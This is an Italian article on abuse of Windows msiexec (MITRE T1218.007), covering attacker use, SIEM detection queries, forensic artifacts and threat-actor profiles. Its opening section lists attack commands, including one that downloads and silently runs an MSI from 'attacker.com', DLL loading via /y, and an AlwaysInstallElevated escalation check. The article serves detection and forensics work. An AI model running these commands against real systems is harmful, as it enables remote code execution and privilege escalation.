Msiexec: System Binary Proxy Execution - Msiexec (T1218.007)

Per comprendere la versatilità di questa tecnica, iniziamo con l'esecuzione remota di un MSI. Il comando base permette di scaricare ed eseguire un installer da un server remoto:

msiexec /q /i https://attacker.com/malicious.msi

Il parametro /q garantisce l'esecuzione silenziosa, mentre /i indica l'installazione. Per simulare l'attacco di TA505, che ha utilizzato proprio questa modalità, possiamo ospitare un MSI su un web server Python e osservare il comportamento.

L'esecuzione di DLL rappresenta un vettore ancora più subdolo. Il comando seguente carica una DLL arbitraria bypassando molti controlli:

msiexec /y C:\temp\payload.dll

Per replicare le tecniche di Duqu, che utilizzava chiavi di cifratura a 56-bit nei parametri PROPERTY=VALUE, possiamo costruire un MSI con payload cifrato. Lo strumento WiX Toolset permette di creare MSI personalizzati con proprietà custom che fungono da chiavi di decrittazione.

La tecnica di ZIRCONIUM combina download remoto e persistenza. Dopo aver scaricato l'MSI iniziale, il gruppo installa servizi Windows per mantenere l'accesso:

msiexec /i \remote-share\installer.msi TARGETDIR=C:\ProgramData /qn

Per testare l'elevazione dei privilegi, verifica prima se AlwaysInstallElevated è abilitato controllando le chiavi di registro HKLM e HKCU. Se attivo, qualsiasi MSI viene eseguito come SYSTEM, rendendo banale l'escalation.

L'injection in processi legittimi, come dimostrato da IcedID, richiede un approccio più sofisticato. Il malware prima avvia msiexec in modalità suspended, poi inietta il payload e riprende l'esecuzione. Questo pattern può essere replicato con strumenti come Process Hollowing PoC disponibili su GitHub.

La detection efficace richiede di monitorare pattern comportamentali specifici piuttosto che singoli eventi. L'analytic DET0158 suggerisce di correlare tre elementi chiave: creazione del processo msiexec.exe, attività di rete verso destinazioni esterne e caricamento di moduli sospetti.

Configura il tuo SIEM per identificare msiexec con parametri che referenziano risorse remote. I pattern da monitorare includono URL HTTP/HTTPS, percorsi UNC e l'uso del flag /y per l'esecuzione di DLL:

process.name="msiexec.exe" AND (
  command_line contains "http://" OR 
  command_line contains "https://" OR
  command_line contains "\\\\" OR
  command_line contains "/y"
)

Gli eventi Sysmon sono particolarmente preziosi. L'EventID 1 cattura la creazione del processo con la command line completa, mentre l'EventID 3 registra le connessioni di rete generate da msiexec. La correlazione temporale tra questi eventi, entro una finestra di 60 secondi, riduce drasticamente i falsi positivi.

Per gestire il rumore di fondo, mantieni una whitelist degli hash MSI legittimi utilizzati nell'ambiente. Software di deployment come SCCM genera traffico msiexec legittimo che va escluso dalle detection. Implementa liste di domini/IP sospetti specifiche per msiexec, separate dalle blacklist generali.

Un indicatore ad alta fedeltà è l'esecuzione di msiexec da directory non standard come %TEMP% o %APPDATA%. Raspberry Robin utilizza proprio questa tecnica, eseguendo msiexec da location temporanee per comunicare con l'infrastruttura C2.

Il monitoraggio delle proprietà personalizzate nei comandi msiexec può rivelare tentativi di passare chiavi di decrittazione o parametri di configurazione, come osservato negli attacchi Duqu.

L'analisi forense di abusi msiexec richiede l'esame di molteplici artefatti Windows. Il registro eventi di Windows Installer (Application Log) contiene dettagli preziosi su ogni installazione, inclusi EventID 1033 e 1034 che documentano inizio e fine dell'installazione con codici prodotto MSI.

I file di log MSI in %TEMP% con pattern MSI*.LOG conservano informazioni dettagliate sulle operazioni eseguite. Questi log sopravvivono spesso alla cancellazione del malware stesso e contengono timestamp precisi, file estratti e chiavi di registro modificate.

L'analisi delle chiavi di registro sotto HKLM\SOFTWARE\Classes\Installer\Products rivela tracce di tutti i prodotti MSI installati, anche dopo la disinstallazione. Ogni prodotto ha un GUID univoco che permette di tracciare l'attività nel tempo.

Per ricostruire la timeline dell'attacco 3CX Supply Chain, l'analisi si è concentrata sui timestamp di creazione dei file estratti dall'MSI malevolo. Il file ffmpeg.dll, caricato da 3CXDesktopApp.exe, manteneva timestamp di compilazione che precedevano di mesi la distribuzione, indicando una lunga fase di preparazione.

Le connessioni di rete generate da msiexec lasciano tracce nel registro ETW di Windows Filtering Platform. Questi eventi mostrano l'IP di destinazione e la porta utilizzata per scaricare MSI remoti, cruciali per identificare l'infrastruttura dell'attaccante.

L'esame della Prefetch (msiexec.exe-*.pf) rivela la frequenza di esecuzione e i file acceduti. Durante l'operazione RedDelta, i file Prefetch mostravano esecuzioni multiple di msiexec in rapida successione, indicative del download di payload modulari.

APT38 rappresenta il profilo più sofisticato nell'uso di msiexec, integrando la tecnica in campagne finanziarie mirate. Il gruppo combina MSI trojanizzati con tecniche di living-off-the-land, rendendo la detection particolarmente complessa. La loro preferenza per target nel settore bancario suggerisce che continueranno a raffinare metodi di evasione basati su binari firmati.

TA505, noto per le campagne di ransomware su larga scala, utilizza msiexec in modo più opportunistico. Il gruppo distribuisce MSI malevoli attraverso campagne di phishing massive, puntando sulla quantità piuttosto che sulla sofisticazione. Il pattern geografico mostra una concentrazione su aziende nordamericane ed europee con fatturati superiori ai 100 milioni di dollari.

Mustang Panda (associato a RedDelta) dimostra un approccio modulare, utilizzando msiexec come primo stadio per il deployment di PlugX. La focalizzazione su target in Asia orientale e sud-orientale, particolarmente entità governative e think tank, indica che la tecnica rimarrà centrale nelle loro operazioni future.

L'overlap negli strumenti è significativo: IcedID, QakBot e Latrodectus condividono infrastrutture e TTP simili, suggerendo possibili connessioni operative o marketplace criminali condivisi. Tutti e tre utilizzano msiexec per l'injection in processi legittimi, indicando una convergenza verso tecniche di evasione standardizzate.

Il trend emergente mostra un aumento nell'uso di MSI firmati con certificati rubati o acquistati. Clop e Maze hanno dimostrato questa evoluzione, rendendo ancora più difficile la distinzione tra software legittimo e malevolo. L'integrazione con tecniche di supply chain, come dimostrato nell'attacco 3CX, rappresenta probabilmente il futuro di questa tecnica.

Framework MITRE ATT&CK T1218.007. Campagne documentate: 3CX Supply Chain Attack (C0057), RedDelta Modified PlugX Operations (C0047). Risorse detection: Sysmon configuration per msiexec monitoring, Sigma rules repository, Elastic Detection Rules per behavioral analysis.